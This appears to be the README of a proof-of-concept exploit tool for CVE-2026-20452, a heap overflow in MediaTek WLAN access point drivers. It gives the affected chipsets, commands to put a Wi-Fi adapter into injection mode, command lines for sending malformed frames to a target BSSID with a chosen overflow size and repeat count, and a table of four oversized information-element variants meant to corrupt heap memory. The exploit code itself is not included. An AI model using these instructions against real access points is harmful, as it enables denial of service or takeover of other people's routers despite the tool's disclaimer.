Exploit for Heap-based Buffer Overflow in Mediatek Mt6890_Firmware CVE-2026-20452

## https://sploitus.com/exploit?id=CB25E601-F8DB-5A0A-9D27-2D1C005BFA43
# CVE-2026-20452 — MediaTek WLAN AP Heap Overflow PoC

Proof of concept exploit for CVE-2026-20452, a heap-based buffer overflow in MediaTek's WLAN Access Point driver.

## Vulnerability

- **CVE**: CVE-2026-20452
- **CVSS**: 8.0 HIGH
- **CWE**: CWE-122 — Heap-based Buffer Overflow
- **Subcomponent**: wlan (AP driver)
- **Attack Vector**: Adjacent Network (Wi-Fi) — associated client
- **Affected**: MT7615, MT7915, MT7916, MT7981, MT7986, MT7990, MT7992, MT7993, MT6890
- **Patch ID**: WCNCR00480138
- **Bulletin**: https://corp.mediatek.com/product-security-bulletin/June-2026

## Full Article

https://www.hunt-benito.com/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/

## Requirements

- Python 3.7+
- scapy (`pip install scapy`)
- Linux with a Wi-Fi adapter supporting monitor/injection mode

## Usage

### Setup monitor mode

```bash
sudo airmon-ng check kill
sudo airmon-ng start wlan0
# Interface becomes wlan0mon
```

### Run the exploit

```bash
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
```

### With custom parameters

```bash
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
  --overflow-size 1024 --variant 2 --count 50 --delay 0.05
```

### IE Variants

| Variant | IE Type | Description |
|---|---|---|
| 0 | Vendor Specific (221) | Single oversized IE with OUI 00:50:43 |
| 1 | Chained Vendor IEs | Multiple small IEs to corrupt adjacent heap objects |
| 2 | HT Capabilities (45) | Oversized HT Capabilities IE |
| 3 | Extended Capabilities (127) | Oversized Extended Capabilities IE |

## Disclaimer

This tool is provided for authorized security research and educational purposes only. Transmitting on Wi-Fi frequencies may require legal authorization in your jurisdiction. Unauthorized use against systems you do not own or have explicit permission to test is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this tool.